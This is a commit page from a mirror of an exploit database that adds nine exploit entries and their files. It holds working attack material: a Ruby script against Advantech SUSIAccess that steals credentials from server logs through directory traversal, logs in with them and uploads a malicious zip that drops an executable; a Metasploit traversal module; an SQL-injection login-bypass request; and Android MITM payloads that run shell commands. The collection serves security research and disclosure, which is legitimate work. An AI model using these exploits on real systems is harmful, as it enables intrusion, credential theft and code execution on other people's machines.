bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-08-02

Browse source 
9 new exploits

libmad 0.15.1b - 'mp3' Memory Corruption

iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation
SKILLS.com.au Industry App - MITM Remote Code Execution
Virtual Postage (VPA) - MITM Remote Code Execution
Advantech SUSIAccess <= 3.0 - Directory Traversal / Information Disclosure (Metasploit)
Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload
VehicleWorkshop - Authentication Bypass
VehicleWorkshop - Arbitrary File Upload
SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection
This commit is contained in:
Offensive Security 2017-08-02 05:01:31 +00:00
parent c116e6f563
commit baeaf13b13
10 changed files with 897 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -5634,6 +5634,7 @@ id,file,description,date,author,platform,type,port
42398,platforms/linux/dos/42398.txt,"Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9164,6 +9165,7 @@ id,file,description,date,author,platform,type,port
42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15712,6 +15714,8 @@ id,file,description,date,author,platform,type,port
42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
42394,platforms/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",java,remote,0
42349,platforms/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
42350,platforms/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,android,remote,0
42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0
42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
@ -38201,3 +38205,8 @@ id,file,description,date,author,platform,type,port
42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0
42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0
42401,platforms/jsp/webapps/42401.rb,"Advantech SUSIAccess <= 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps,0
42402,platforms/jsp/webapps/42402.rb,"Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",jsp,webapps,0
42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0

Can't render this file because it is too large.

127
platforms/android/remote/42349.txt Executable file
View file

@ -0,0 +1,127 @@
# Exploit Title: SKILLS.com.au Industry App - Remote Code Execution via MITM
# Date: 20/Jul/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP]
# Software Link: N/A
# Screenshot: N/A
# Version: 1.0
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A
SKILLS.com.au Industry App - Remote Code Execution via MITM
Version affected: 1.0
App Info: The Android application reviewed is used to log into the skills.com.au website.
External Links:
https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP]
Credits: MaXe (@InterN0T)
Special Thanks: Geoff Ellis for also identifying credentials being sent over HTTP GET requests before InterN0T did:
https://www.linkedin.com/pulse/insecure-mobile-application-programming-practices-case-geoff-ellis [http://archive.is/LvSeb]
Reference: "String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.Encodeproton-Url(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.Encodeproton-Url(mostCurrent._edittext2.getText(), "UTF8");"
Shouts: SubHacker and the rest of the awesome infosec community.
-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks.
This is caused by the following lines of code within the \a3\skills\com\main.java: (Lines 442 - 448)
StringUtils stringUtils = new StringUtils();
String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.EncodeUrl(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.EncodeUrl(mostCurrent._edittext2.getText(), "UTF8");
WebViewExtras webViewExtras = mostCurrent._webviewextras1;
WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A");
mostCurrent._webview1.LoadUrl(str2);
mostCurrent._t.Initialize(processBA, "LOGGINGIN", 15000);
mostCurrent._t.setEnabled(true);
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml)
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
If an attacker performs a MITM attack against "www.skills.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by
serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.skills.com.au",
then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute
in the context of the application.
The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions
can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.
-:: Proof of Concept ::-
A successful attack that makes "www.skills.com.au" serve the following code:
<script>
function execute(cmd){
return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a3.skills.com/owned']);
execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
</script>
This application has been owned.
Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
The vulnerable HTTP request is triggered when a user attempts to log in with any set of credentials.
-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
WebView webView = new WebView(this);
setContentView(webView);
...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
<manifest>
<uses-sdk android:minSdkVersion="17" />
...
</manifest>
The URL used ("http://www.skills.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
private void exposeJsInterface() {
if (VERSION.SDK_INT < 17) {
Log.i(TAG, "addJavascriptInterface() bridge disabled.");
} else {
addJavascriptInterface(Object, "EVENT_NAME_HERE");
}
}
In relation to the credentials being sent over plain-text HTTP GET requests, the following are the most basic recommendations to be implemented:
- All URLS within the application must utilize HTTPS.
- Certificate pinning should also be implemented.
- Usernames and passwords should not be sent over HTTP GET requests, HTTP POST requests should be used instead.
References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
Filename: a3.skills.com_manual.apk
File size: 332,914 bytes
md5: d1022a25893ec8549234d20fa55c13f8
sha1: 96f85493332e9b2a2efecc4acdca75f84c13809d
sha256: e1724043dbca70a76a33598d3483fba51ae171ed0d05a4e5cacab103c1c2a21c
App Name: SKILLS.com.au Industry App
Package Name: a3.skills.com
Package Version: 1.0
Disclosure Timeline:
- 20Jul17: Vendor is informed about advisories.
- 20Jul17: Vendor responds: https://ghostbin.com/paste/jrt2e#L28
- 20Jul17: InterN0T email to vendor: https://ghostbin.com/paste/zjcam
- 20Jul17: Vendor responds: https://ghostbin.com/paste/vzv3y
- 20Jul17: Advisory released to the public.
=== EOF ===

127
platforms/android/remote/42350.txt Executable file
View file

@ -0,0 +1,127 @@
# Exploit Title: Virtual Postage (VPA) - Remote Code Execution via MITM
# Date: 20/Jul/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a2.virtualpostage.com [http://archive.is/EdtJT]
# Software Link: N/A
# Screenshot: N/A
# Version: 1.0
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A
Virtual Postage (VPA) - Remote Code Execution via MITM
Version affected: 1.0
App Info: The Android application reviewed allows a user to calculate how much postage will cost.
External Links:
https://play.google.com/store/apps/details?id=a2.virtualpostage.com [http://archive.is/EdtJT]
Credits: MaXe (@InterN0T)
Special Thanks: Geoff Ellis for also identifying credentials being sent over HTTP GET requests before InterN0T did:
https://www.linkedin.com/pulse/insecure-mobile-application-programming-practices-case-geoff-ellis [http://archive.is/LvSeb]
Reference: "String str2 = "http://www.virtualpostage.com.au/auth.asp?Username=" + stringUtils.Encodeproton-Url(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.Encodeproton-Url(mostCurrent._edittext2.getText(), "UTF8");"
Shouts: SubHacker and the rest of the awesome infosec community.
-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks.
This is caused by the following lines of code within the \a2\virtualpostage\com\main.java file: (Lines 442 - 448)
StringUtils stringUtils = new StringUtils();
String str2 = "http://www.virtualpostage.com.au/auth.asp?Username=" + stringUtils.EncodeUrl(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.EncodeUrl(mostCurrent._edittext2.getText(), "UTF8");
WebViewExtras webViewExtras = mostCurrent._webviewextras1;
WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A");
mostCurrent._webview1.LoadUrl(str2);
mostCurrent._t.Initialize(processBA, "LOGGINGIN", 15000);
mostCurrent._t.setEnabled(true);
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml)
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
If an attacker performs a MITM attack against "www.virtualpostage.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by
serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.virtualpostage.com.au",
then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute in the
context of the application.
The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be
used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.
-:: Proof of Concept ::-
A successful attack that makes "www.virtualpostage.com.au" serve the following code:
<script>
function execute(cmd){
return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a2.virtualpostage.com/owned']);
execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
</script>
This application has been owned.
Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
The vulnerable HTTP request is triggered when a user attempts to log in with any set of credentials.
-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
WebView webView = new WebView(this);
setContentView(webView);
...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
<manifest>
<uses-sdk android:minSdkVersion="17" />
...
</manifest>
The URL used ("http://www.virtualpostage.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
private void exposeJsInterface() {
if (VERSION.SDK_INT < 17) {
Log.i(TAG, "addJavascriptInterface() bridge disabled.");
} else {
addJavascriptInterface(Object, "EVENT_NAME_HERE");
}
}
In relation to the credentials being sent over plain-text HTTP GET requests, the following are the most basic recommendations to be implemented:
- All URLS within the application must utilize HTTPS.
- Certificate pinning should also be implemented.
- Usernames and passwords should not be sent over HTTP GET requests, HTTP POST requests should be used instead.
References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
Filename: a2.virtualpostage.com_manual.apk
File size: 304,307 bytes
md5: 1da27e27eb8447ab489eb1aae3cd14f6
sha1: f67a2c1f55879024c5ecd1194e6704a4286ea021
sha256: 0813eb25d08d877af66c8570153580da2c1df3fb873270422dca6be8dbe98932
App Name: VPA
Package Name: a2.virtualpostage.com
Package Version: 1.0
Disclosure Timeline:
- 20Jul17: Vendor is informed about advisories.
- 20Jul17: Vendor responds: https://ghostbin.com/paste/jrt2e#L28
- 20Jul17: InterN0T email to vendor: https://ghostbin.com/paste/zjcam
- 20Jul17: Vendor responds: https://ghostbin.com/paste/vzv3y
- 20Jul17: Advisory released to the public.
=== EOF ===

41
platforms/hardware/webapps/42408.txt Executable file
View file

@ -0,0 +1,41 @@
Vulnerability type:
SQL injection, leading to administrative access through authentication bypass.
-----------------------------------
Product: SOL.Connect ISET-mpp meter
-----------------------------------
Affected version: SOL.Connect ISET-mpp meter 1.2.4.2 and possibly earlier
Vulnerable parameter: user
------------------------
Credit: Andy Tan
------------------------
CVE ID: CVE-2017-11494
------------------------
================
Proof of Concept
================
HTTP Request:
POST /_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab977276
3f3c97e69_/%3fs%3dmain HTTP/1.1
Host: <IP-address>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://<IP-address>/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4
a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
action=submit&origin=%2F_45b4a69e249c1d0ab9772763f3c97e69_%2F%3Fs%3Dmain
&s=login&user=admin%27+or+%271%27%3D%271+--%2B&password=asd
------------------------
Vendor contact timeline:
------------------------
2017-07-20: Contacted vendor. No response.
2017-07-26: Contacted vendor again. No response.
2017-08-01: Public disclosure.

100
platforms/jsp/webapps/42401.rb Executable file
View file

@ -0,0 +1,100 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech SUSIAccess Server Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits an information disclosure vulnerability found in
Advantech SUSIAccess <= version 3.0. The vulnerability is triggered when
sending a GET request to the server with a series of dot dot slashes (../)
in the file parameter.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-9349' ],
[ 'ZDI', '16-628' ],
[ 'BID', '94629' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04' ]
],
'DisclosureDate' => 'Dec 13 2016'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(8080)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
file = "#{levels}#{datastore['FILE']}"
file = file.gsub(/ /, "%20")
res = send_request_raw({
'method' => 'GET',
'uri' => "/downloadCSV.jsp?file=#{file}",
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('advantech_susiaccess.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
else
print_error("Something went wrong... Application returned a #{res.code}")
end
end
end
__END__
<%@ page import="java.util.*,java.io.*" %>
<%
File f = new File (getServletContext().getRealPath("/") + request.getParameter("file") );
//set the content type(can be excel/word/powerpoint etc..)
response.setContentType ("application/csv");
//set the header and also the Name by which user will be prompted to save
response.setHeader ("Content-Disposition", "attachment; filename=\""+request.getParameter("file").split("/")[2] +"\"");
//get the file name
String name = f.getName().substring(f.getName().lastIndexOf("/") + 1,f.getName().length());
//OPen an input stream to the file and post the file contents thru the
//servlet output stream to the client m/c
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int bit = 256;
int i = 0;
try {
while ((bit) >= 0) {
bit = in.read();
outs.write(bit);
}
//System.out.println("" +bit);
} catch (IOException ioe) {
ioe.printStackTrace(System.out);
}
// System.out.println( "n" + i + " bytes sent.");
// System.out.println( "n" + f.length() + " bytes sent.");
outs.flush();
outs.close();
in.close();
%>

219
platforms/jsp/webapps/42402.rb Executable file
View file

@ -0,0 +1,219 @@
#! /usr/bin/env ruby
=begin
Exploit Title: Advantech SUSIAccess RecoveryMgmt File Upload
Date: 07/31/17
Exploit Author: james fitts
Vendor Homepage: http://www.advantech.com/
Version: Advantech SUSIAccess <= 3.0
Tested on: Windows 7 SP1
Relavant Advisories:
ZDI-16-630
ZDI-16-628
CVE-2016-9349
CVE-2016-9351
BID-94629
ICSA-16-336-04
Notes:
This PoC will upload AcronisInstaller.exe to the root of C:\
You can modify this to drop files where ever you want on the
filesystem.
By default the script will use the directory traversal vuln
to pull down the log files and parse for the base64 encoded
credentials. Once it has that, it will use them to log into
the application and upload the malicious zip file.
=end
require 'mime/types'
require 'fileutils'
require 'net/http'
require 'nokogiri'
require 'base64'
require 'digest'
require 'date'
require 'uri'
require 'zip'
def uploadZip(target, creds, cookies)
uri = URI("http://#{target}:8080/webresources/RecoveryMgmt/upload")
bound = "AaBbCcDdEe"
path = Dir.pwd
zipfile = "#{path}/update.zip"
post_data = []
post_data << "--#{bound}\r\n"
post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_LastUpdateName\""
post_data << "\r\n\r\n\r\n"
post_data << "--#{bound}\r\n"
post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_UploadFileFullName\""
post_data << "\r\n\r\nupdate.zip\r\n"
post_data << "--#{bound}\r\n"
post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_Content\""
post_data << "\r\n\r\n"
post_data << "<request Authorization=\"#{creds[0].to_s}\"/>\r\n"
post_data << "--#{bound}\r\n"
post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_FileInput\"; filename=\"update.zip\""
post_data << "\r\nContent-Type: application/zip"
post_data << "\r\n\r\n"
post_data << File.read(zipfile)
post_data << "\r\n\r\n--#{bound}--\r\n"
req = Net::HTTP::Post.new(uri, initheader = {
'Cookie' => cookies,
'Authorization' => "Basic #{creds[0].to_s}",
'X-Requested-With' => "XMLHttpRequest",
'Content-Type' => "multipart/form-data; boundary=#{bound}",
'User-Agent' => "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
'Accept-Language' => "en-US,en;q=0.5",
'Accept' => "text/plain, */*; q=0.01",
'Connection' => "close"
})
req.body = post_data.join
http = Net::HTTP.new("#{target}", 8080)
res = http.start {|http| http.request(req)}
if res.code =~ /200/
puts "[+] Upload successful!"
end
end
def craftZip(target, payload)
path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml"
uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}")
res = Net::HTTP.get_response(uri)
xml = Nokogiri::XML(res.body)
ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/version').to_s.split("=")[1].split("\"")[1]
kern_ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/kernal_version').to_s.split("=")[1].split("\"")[1]
# version information doesn't matter
# the application will still extract the zip
# file regardless of whether or not its
# a greater version or lesser
f = File.open("LatestVersion.txt", 'w')
f.puts("Installer Version: #{ver}\r\nApplication Version: #{kern_ver}")
f.close
f = File.open("md5.txt", 'w')
md5 = Digest::MD5.hexdigest(File.read("AcronisInstaller.exe"))
f.puts md5
f.close
path = Dir.pwd
zipfile = "#{path}/update.zip"
if File.exist?(zipfile)
FileUtils.rm(zipfile)
end
files = ["AcronisInstaller.exe", "LatestVersion.txt", "md5.txt"]
levels = "../" * 10
Zip::File.open(zipfile, Zip::File::CREATE) do |zip|
files.each do |fname|
if fname == "AcronisInstaller.exe"
zip.add("#{levels}#{fname}", fname)
end
zip.add(fname, fname)
end
end
if File.exist?(zipfile)
puts "[!] Malicious zip created successfully"
end
end
def doLogin(target, creds)
formattedDate = DateTime.now.strftime("%a %b %d %Y %H:%M:%S GMT-0400 (EDT)")
formattedDate = URI::encode(formattedDate)
uri = URI("http://#{target}:8080/frmServer.jsp?d=#{formattedDate}")
res = Net::HTTP.get_response(uri)
jsessid = res.header['Set-Cookie'].split(';')[0]
cookies = "deviceType=pc; log4jq=OFF; selectedLang=en_US; #{jsessid}"
uname = Base64.decode64(creds[0].to_s).split(":")[0]
pass = Base64.decode64(creds[0].to_s).split(":")[1]
data = "<request Authorization=\"#{creds[0].to_s}\">"
data << "<item name=\"username\" value=\"#{uname}\"/>"
data << "<item name=\"password\" value=\"#{pass}\"/>"
data << "</request>"
puts "[+] Attempting login with pilfered credentials now"
uri = URI("http://#{target}:8080/webresources/AccountMgmt/Login")
req = Net::HTTP::Post.new(uri, initheader = {
'Content-Type' => "application/xml",
'Cookies' => cookies,
'Authorization' => "Basic #{creds[0].to_s}",
'X-Requested-With' => 'XMLHttpRequest'
})
req.body = data
http = Net::HTTP.new("#{target}", 8080)
res = http.start {|http| http.request(req)}
if res.body =~ /<result><role name/
puts "[+] Login successful!"
return cookies
else
puts "[-] Something went wrong..."
end
end
def getCreds(target)
cnt = 1
d = Date.today
d.strftime("%y-%m-%d")
creds = []
while cnt < 31
fdate = d - cnt
cnt += 1
path = "../../../../../../../../../../Program Files\\Apache Software Foundation\\logs\\"
file = "localhost_access_log.#{fdate}.txt"
full_path = path + file
uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{full_path}")
res = Net::HTTP.get_response(uri)
if res.code =~ /200/
creds << res.body.scan(/(?<=Authorization=%22)[A-Za-z0-9=]+/)
end
end
return creds.flatten.uniq
end
##
# Main
##
if ARGV.length != 1
puts "Usage:\r\n\truby #{$0} [TARGET IP]"
else
target = ARGV[0]
payload = "AcronisInstaller.exe"
puts "[+] Extracting credentials now..."
credentials = getCreds(target)
if credentials.length > 0
puts "[!] Credentials found!"
cookies = doLogin(target, credentials)
puts "[+] Crafting malicious zip now..."
craftZip(target, payload)
uploadZip(target, credentials, cookies)
else
puts "[-] Credentials not found.. Try searching for more log files.."
exit
end
end

60
platforms/linux/dos/42409.txt Executable file
View file

@ -0,0 +1,60 @@
libmad memory corruption vulnerability
================
Author : qflb.wu
===============
Introduction:
=============
libmad is a high-quality MPEG audio decoder capable of 24-bit output.
Affected version:
=====
0.15.1b
Vulnerability Description:
==========================
the mad_decoder_run function in decoder.c in libmad 0.15.1b can cause a denial of service(memory corruption) via a crafted mp3 file.
I found this bug when I test mpg321 0.3.2 which used the libmad library.
./mpg321 libmad_0.15.1b_memory_corruption.mp3
----debug info:----
Program received signal SIGABRT, Aborted.
0x00007ffff6bf7cc9 in __GI_raise (sig=sig@entry=6)
at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff6bf7cc9 in __GI_raise (sig=sig@entry=6)
at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff6bfb0d8 in __GI_abort () at abort.c:89
#2 0x00007ffff6c34394 in __libc_message (do_abort=do_abort@entry=1,
fmt=fmt@entry=0x7ffff6d42b28 "*** Error in `%s': %s: 0x%s ***\n")
at ../sysdeps/posix/libc_fatal.c:175
#3 0x00007ffff6c4066e in malloc_printerr (ptr=<optimized out>,
str=0x7ffff6d42c58 "double free or corruption (out)", action=1)
at malloc.c:4996
#4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0)
at malloc.c:3840
#5 0x00007ffff749ab43 in mad_decoder_run (
decoder=decoder@entry=0x7fffffffbd20,
mode=mode@entry=MAD_DECODER_MODE_SYNC) at decoder.c:559
#6 0x0000000000403d5d in main (argc=<optimized out>, argv=<optimized out>)
at mpg321.c:1092
(gdb)
POC:
libmad_0.15.1b_memory_corruption.mp3
CVE:
CVE-2017-11552
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42409.zip

80
platforms/multiple/local/42407.txt Executable file
View file

@ -0,0 +1,80 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1247
When XPC serializes large xpc_data objects it creates mach memory entry ports
to represent the memory region then transfers that region to the receiving process
by sending a send right to the memory entry port in the underlying mach message.
By crafting our own xpc message (or using an interposition library as this poc does)
we can pass different flags to mach_make_memory_entry_64 such that the memory entry
received by the target process actually represents a region of shared memory such that
when the xpc_data deserialization code maps the memory entry port the memory region remains
mapped in the sender's address space and the sender can still modify it (with the receiver
seeing the updates.)
Perhaps this is intended behaviour but there's definitely plenty of code which doesn't expect
the contents of xpc_data objects to change.
In this PoC I target NSXPC, a high-level RPC mechanism which uses XPC for its low-level transport layer.
NSXPC is widely used across privilege boundaries.
NSXPCDecoder is implemented in Foundation. Clients send serialized NSInvocation objects
representing the methods they wish to call on the remote objects. These NSInvocations are serialized
using the NSSecureCoding method which ends up creating a bplist16 serialized byte stream.
That bplist16 buffer gets sent in an xpc message as an xpc_data object.
NSXPCDecoder wraps the bplist16 deserialization and for selectors such as decodeCStringForKey:
,if the key is present, the value returned will be a pointer directly into the
xpc_data object in which it was received.
By crafting our own memory entry object this means the pointers returned by decodeCStringForKey:
actually point into shared memory which can still be modified by the caller.
This can be turned directly into controlled memory corruption by targetting the serialized method
type signature (key 'ty') which is parsed by [NSMethodSignature signatureWithObjCTypes].
This method is implemented in CoreFoundation. If the method signature string isn't in a cache of
parsed signatures then the string is passed to __NSMS1. This function calls __NSGetSizeAndAlignment
to determine the size of a buffer required to parse the signature string which __NSMS1 then allocates
using calloc before parsing the signature string into the allocated buffer. If we change the
types represented by the signature string (which is in shared memory) between these two calls
we can cause the parsing code to write out of bounds as it assumes that the length computed by
__NSGetSizeAndAlignment is correct.
The most direct path to trigger memory controlled memory corruption is to use a type signature like this:
@"ABCD"
That will cause 7 bytes of buffer space to be allocated for the parsed signature
(which will just contain a copy of the string.)
If we increase the length of the string in shared memory eg to:
@"ABCDOVERFLOW_OVERFLOW_OVERFLOW"
then __NSMS1 will copy the extra bytes up until it encounters a '"' character.
This PoC targets the airportd daemon which runs as root but should work for any NSXPC service.
This is a race condition so you may have to run the PoC multiple times (./run.sh) and also use
